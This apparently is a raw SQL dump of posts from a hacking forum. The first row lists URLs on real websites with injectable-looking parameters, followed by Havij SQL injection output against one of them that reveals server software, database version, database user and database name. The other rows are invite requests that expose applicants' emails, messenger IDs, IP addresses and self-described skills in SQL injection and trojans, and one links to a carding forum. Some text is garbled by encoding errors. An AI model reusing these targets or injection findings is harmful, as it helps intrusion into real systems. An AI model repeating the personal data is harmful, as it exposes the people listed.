(1510, 1363, 1505, 'null', 9, '', 1407750048, '[QUOTE][url]http://e-cultura.sapo.pt/WebETeatro.aspx?ID=1[/url][/QUOTE]\r\n\r\n[QUOTE][url]http://www.citador.iol.pt/poemas.php?op=10&refid=200809030120[/url][/QUOTE]\r\nÿðрðüõтр refid\r\n\r\n[QUOTE][url]http://kontakten.dn.se/index.php?pg=ProfileSearch&AdNum=201484[/url][/QUOTE]\r\n\r\nÿрø ÿþüþщø havij\r\nTarget: [url]http://kontakten.dn.se/index.php?pg=ProfileSearch&AdNum=201484[/url]\r\nHost IP: 62.236.255.55\r\nWeb Server: Embperl/2.0rc3 Apache/2.0.50 (Linux/SUSE)\r\nPowered-by: PHP/4.3.8\r\nDB Server: MySQL\r\nResp. Time(avg): 118 ms\r\nCurrent User: [email]tansuk@weturi.lucentia.com[/email]\r\nSql Version: 4.0.21-log\r\nCurrent DB: MSGMAN_SE\r\nSystem User: [email]tansuk@weturi.lucentia.com[/email]', 1, 0, '', 0, 1, 0, 0, 0),
(1511, 1367, 0, 'Invite', 2, '{$name}', 1407750172, '[SIZE=\'4\'][COLOR=\'Sienna\']swp[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: swpower@exploit.im\n[b]e-mail[/b]: powersw@hushmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\nVery good at sqlinjection discovering, looking for some new methods\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 92.37.11.132\n[*][b]real ip[/b]: 92.37.11.132\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://swp.jku.at | swp.jku.at \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1512, 1368, 0, 'Invite', 2, '{$name}', 1407750184, '[SIZE=\'4\'][COLOR=\'Sienna\']swp[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: swpower@exploit.im\n[b]e-mail[/b]: powersw@hushmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\nVery good at sqlinjection discovering, looking for some new methods\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 92.37.11.132\n[*][b]real ip[/b]: 92.37.11.132\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://swp.jku.at | swp.jku.at \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1513, 1369, 0, 'Invite', 2, '{$name}', 1407750199, '[SIZE=\'4\'][COLOR=\'Sienna\']swp[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: swpower@exploit.im\n[b]e-mail[/b]: powersw@hushmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\nVery good at sqlinjection discovering, looking for some new methods\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 92.37.11.132\n[*][b]real ip[/b]: 92.37.11.132\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://swp.jku.at | swp.jku.at \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1514, 1370, 0, 'Invite', 2, '{$name}', 1407751246, '[SIZE=\'4\'][COLOR=\'Sienna\']ghostx[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 697158251\n[b]e-mail[/b]: xtrem375@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.179.113.12\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://ghostx.wikia.com | ghostx.wikia.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1515, 1371, 0, 'Invite', 2, '{$name}', 1407751327, '[SIZE=\'4\'][COLOR=\'Sienna\']ghostx[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 697158251\n[b]e-mail[/b]: xtrem375@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.179.113.12\n[*][b]real ip[/b]: 79.179.113.12\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://ghostx.wikia.com | ghostx.wikia.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1516, 1372, 0, 'Invite', 2, '{$name}', 1407753219, '[SIZE=\'4\'][COLOR=\'Sienna\']Dz021[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Hacker\n[b]e-mail[/b]: ziadchanneltv@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.97.163.155\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/minimized.../436526182524149760 | https://twitter.com/minimized.../436526182524149760 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1517, 1373, 0, 'Invite', 2, '{$name}', 1407754906, '[SIZE=\'4\'][COLOR=\'Sienna\']betshx[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: betshx@jabber.root.cz\n[b]e-mail[/b]: betshx@live.ca\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.140.8.135\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/Betshx/status/493011640158543872 | https://twitter.com/Betshx/status/493011640158543872 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1518, 1374, 0, 'Invite', 2, '{$name}', 1407756422, '[SIZE=\'4\'][COLOR=\'Sienna\']WarFarMa[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: fake@email.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 2.6.133.21\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/WarFarMa | https://twitter.com/WarFarMa \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1519, 1375, 0, 'Invite', 2, '{$name}', 1407760554, '[SIZE=\'4\'][COLOR=\'Sienna\']zixia[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 1111111\n[b]e-mail[/b]: 2305212271@qq.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 192.157.231.105\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://zixia.net | zixia.net \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1520, 1376, 0, 'Invite', 2, '{$name}', 1407760730, '[SIZE=\'4\'][COLOR=\'Sienna\']zixia[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: not have\n[b]e-mail[/b]: 2305212271@qq.com\n[b]Info[/b]: I am a web pentester.and focus on web security research.\r\nand from china .thanks for give me an opportunity to get in. \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 192.157.231.105\n[*][b]real ip[/b]: 192.157.231.105\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://zixia.net | zixia.net \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1521, 1377, 0, 'Invite', 2, '{$name}', 1407762013, '[SIZE=\'4\'][COLOR=\'Sienna\']goodtrip[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: sutigi@alivance.com\n[b]e-mail[/b]: sutigi@alivance.com\n[b]Info[/b]: hacking, windows expl, sql injection, bases, trojans\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 95.42.63.35\n[*][b]real ip[/b]: 95.42.63.35\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/GoodTrip_kyoto | https://twitter.com/GoodTrip_kyoto \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1522, 1378, 0, 'Invite', 2, '{$name}', 1407767801, '[SIZE=\'4\'][COLOR=\'Sienna\']bluesky22[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: bluesky22@jabber.ru\n[b]e-mail[/b]: bluesky22@bk.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 192.243.126.249\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.citysearch.com/profile/...oh/hess_jewelers.html | http://www.citysearch.com/profile/...oh/hess_jewelers.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1523, 1379, 0, 'Invite', 2, '{$name}', 1407768727, '[SIZE=\'4\'][COLOR=\'Sienna\']ru_vor[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: trafx@rows.io\n[b]e-mail[/b]: 9.6.9.6.7.9.6@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 178.17.170.19\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://video.yandex.ru/users/voryvzakone/view/1/user-tag/тðту/ | http://video.yandex.ru/users/voryvzakone/view/1/user-tag/тðту/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1524, 1380, 0, 'Invite', 2, '{$name}', 1407777645, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@kakak.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1525, 1381, 0, 'Invite', 2, '{$name}', 1407777690, '[SIZE=\'4\'][COLOR=\'Sienna\']w0rm_123[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: w0rm_123@123.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.xboxlivescore.com/profile/blAck-w0rm123 | http://www.xboxlivescore.com/profile/blAck-w0rm123 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1526, 1382, 0, 'Invite', 2, '{$name}', 1407778611, '[SIZE=\'4\'][COLOR=\'Sienna\']lamarez[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 123424, lam@xip.su\n[b]e-mail[/b]: alex.boesky@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 78.111.187.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/LAMAREZ | https://twitter.com/LAMAREZ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1527, 1383, 0, 'Invite', 2, '{$name}', 1407779838, '[SIZE=\'4\'][COLOR=\'Sienna\']w0rm_w0rm[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: TEST@TEST.RU\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://crdpro.su/member.php?u=44946 | http://crdpro.su/member.php?u=44946 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
